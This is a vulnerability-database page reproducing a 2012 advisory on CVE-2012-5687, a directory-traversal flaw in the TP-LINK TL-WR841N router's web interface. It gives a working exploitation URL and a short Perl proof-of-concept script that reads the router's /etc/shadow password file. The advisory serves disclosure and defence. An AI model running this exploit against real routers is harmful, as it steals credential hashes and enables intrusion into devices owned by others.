Lucene search
K

TP-LINK TL-WR841N Local File Inclusion

🗓️ 29 Oct 2012 00:00:00Reported by Matan AzugiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 50 Views

TP-LINK TL-WR841N LFI Vulnerability, Firmware 3.13.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-5687
29 May 201815:50
circl
Check Point Advisories
TP-Link Wireless Lite N Access Point Directory Traversal (CVE-2012-5687)
15 Oct 201300:00
checkpoint_advisories
CVE
CVE-2012-5687
1 Nov 201210:00
cve
Cvelist
CVE-2012-5687
1 Nov 201210:00
cvelist
Metasploit
TP-Link Wireless Lite N Access Point Directory Traversal Vulnerability
23 Mar 201321:25
metasploit
NVD
CVE-2012-5687
1 Nov 201210:44
nvd
OpenVAS
TP-LINK TL-WR841N Router LFI Vulnerability (Oct 2012) - Active Check
30 Oct 201200:00
openvas
Packet Storm
TP-Link Wireless Lite N Access Point Directory Traversal
1 Sep 202400:00
packetstorm
Prion
Directory traversal
1 Nov 201210:44
prion
securityvulns
[BUGTRAQ]Security Advisory - TP-LINK TL-WR841N LFI - [UPDATE]
1 Nov 201200:00
securityvulns
Rows per page
`=| Security Advisory - TP-LINK TL-WR841N LFI |=  
  
Issue: TL-WR841N 300Mbps Wireless N Router by "TP-LINK"  
Firmware Version: 3.13.9 Build 120201 Rel.54965n And Below versions  
Discovered Date: 24/10/2012  
CVE-ID: CVE-2012-5687  
Author: Matan Azugi [[email protected]] Product Vendor:  
http://www.tp-link.com/en/products/details/?model=TL-WR841N   
  
Details:  
  
TP-LINK TL-WR841N Wireless Router is prone to a Local File Inclusion(LFI)  
Vulnerability.  
The vulnerability exists in Web-Based Management. The URL parameter is not  
properly sanitized before being used.  
Exploitation URL:   
  
http://192.168.0.1/help/../../../../../../../../etc/shadow  
  
Successful exploitation allows viewing the router configuration and password  
files.  
  
Proof of Concept Code:   
  
#TP-LINK TL-WR841N Shadow file grabber#  
#built by Pulse [email protected]#  
#enjoy#  
  
use LWP::UserAgent;  
$host = $ARGV[0];  
chomp($host);  
if($host !~ /http:\/\//) { $host = "http://$host"; };  
  
my $ua = LWP::UserAgent->new;  
$ua->timeout(30);  
$lfi = "/help/../../../../../../../../etc/shadow";  
$url = $host.$lfi;  
$request = HTTP::Request->new('GET', $url); $response =  
$ua->request($request); my $html = $response->content; if($html =~ /root/) {  
print "root$' \n" ; }  
  
  
Thank You,  
Matan Azugi, MCSE OSCP  
http://www.madsec.co.il  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Oct 2012 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.6748
50